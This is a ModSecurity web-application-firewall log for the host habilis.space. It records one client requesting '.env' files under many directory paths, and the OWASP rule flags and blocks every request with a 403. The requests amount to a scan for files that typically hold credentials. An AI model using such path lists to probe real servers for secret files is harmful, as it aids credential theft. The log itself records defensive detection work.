[Mon May 11 17:33:44.774116 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/bin/.env"] [unique_id "agH22Py_GXSWIKeli0sMFgAAAI8"]
[Mon May 11 17:33:44.774350 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/bin/.env"] [unique_id "agH22Py_GXSWIKeli0sMFgAAAI8"]
[Mon May 11 17:33:44.774572 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22Py_GXSWIKeli0sMFgAAAI8"]
[Mon May 11 17:33:44.886212 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/sbin/.env"] [unique_id "agH22Py_GXSWIKeli0sMGAAAAI8"]
[Mon May 11 17:33:44.886443 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/sbin/.env"] [unique_id "agH22Py_GXSWIKeli0sMGAAAAI8"]
[Mon May 11 17:33:44.886672 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22Py_GXSWIKeli0sMGAAAAI8"]
[Mon May 11 17:33:44.997818 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/local/.env"] [unique_id "agH22Py_GXSWIKeli0sMGQAAAI8"]
[Mon May 11 17:33:44.998043 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/local/.env"] [unique_id "agH22Py_GXSWIKeli0sMGQAAAI8"]
[Mon May 11 17:33:44.998284 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22Py_GXSWIKeli0sMGQAAAI8"]
[Mon May 11 17:33:45.231651 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/portal/.env"] [unique_id "agH22fy_GXSWIKeli0sMGgAAAI8"]
[Mon May 11 17:33:45.231882 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/portal/.env"] [unique_id "agH22fy_GXSWIKeli0sMGgAAAI8"]
[Mon May 11 17:33:45.232107 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22fy_GXSWIKeli0sMGgAAAI8"]
[Mon May 11 17:33:45.345082 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/dashboard/.env"] [unique_id "agH22fy_GXSWIKeli0sMGwAAAI8"]
[Mon May 11 17:33:45.345315 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/dashboard/.env"] [unique_id "agH22fy_GXSWIKeli0sMGwAAAI8"]
[Mon May 11 17:33:45.345536 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22fy_GXSWIKeli0sMGwAAAI8"]
[Mon May 11 17:33:45.545435 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/panel/.env"] [unique_id "agH22fy_GXSWIKeli0sMHAAAAI8"]
[Mon May 11 17:33:45.545625 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/panel/.env"] [unique_id "agH22fy_GXSWIKeli0sMHAAAAI8"]
[Mon May 11 17:33:45.545857 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22fy_GXSWIKeli0sMHAAAAI8"]
[Mon May 11 17:33:45.656974 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/crm/.env"] [unique_id "agH22fy_GXSWIKeli0sMHQAAAI8"]
[Mon May 11 17:33:45.657216 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/crm/.env"] [unique_id "agH22fy_GXSWIKeli0sMHQAAAI8"]
[Mon May 11 17:33:45.657491 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22fy_GXSWIKeli0sMHQAAAI8"]
[Mon May 11 17:33:45.768908 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/erp/.env"] [unique_id "agH22fy_GXSWIKeli0sMHgAAAI8"]
[Mon May 11 17:33:45.769137 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/erp/.env"] [unique_id "agH22fy_GXSWIKeli0sMHgAAAI8"]
[Mon May 11 17:33:45.769393 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22fy_GXSWIKeli0sMHgAAAI8"]
[Mon May 11 17:33:45.882890 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/shop/.env"] [unique_id "agH22fy_GXSWIKeli0sMIAAAAI8"]
[Mon May 11 17:33:45.883122 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/shop/.env"] [unique_id "agH22fy_GXSWIKeli0sMIAAAAI8"]
[Mon May 11 17:33:45.883409 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22fy_GXSWIKeli0sMIAAAAI8"]
[Mon May 11 17:33:46.314395 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/store/.env"] [unique_id "agH22vy_GXSWIKeli0sMIgAAAI8"]
[Mon May 11 17:33:46.314610 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/store/.env"] [unique_id "agH22vy_GXSWIKeli0sMIgAAAI8"]
[Mon May 11 17:33:46.314822 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22vy_GXSWIKeli0sMIgAAAI8"]
[Mon May 11 17:33:46.425557 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/saas/.env"] [unique_id "agH22vy_GXSWIKeli0sMIwAAAI8"]
[Mon May 11 17:33:46.425731 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/saas/.env"] [unique_id "agH22vy_GXSWIKeli0sMIwAAAI8"]
[Mon May 11 17:33:46.425930 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22vy_GXSWIKeli0sMIwAAAI8"]
[Mon May 11 17:33:46.537786 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/client/.env"] [unique_id "agH22vy_GXSWIKeli0sMJQAAAI8"]
[Mon May 11 17:33:46.538008 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/client/.env"] [unique_id "agH22vy_GXSWIKeli0sMJQAAAI8"]
[Mon May 11 17:33:46.538246 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22vy_GXSWIKeli0sMJQAAAI8"]
[Mon May 11 17:33:46.656627 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /project/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/project/.env"] [unique_id "agH22vy_GXSWIKeli0sMJgAAAI8"]
[Mon May 11 17:33:46.656853 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/project/.env"] [unique_id "agH22vy_GXSWIKeli0sMJgAAAI8"]
[Mon May 11 17:33:46.657078 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH22vy_GXSWIKeli0sMJgAAAI8"]
[Mon May 11 17:33:47.033937 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/admin-panel/.env"] [unique_id "agH22_y_GXSWIKeli0sMJwAAAI8"]
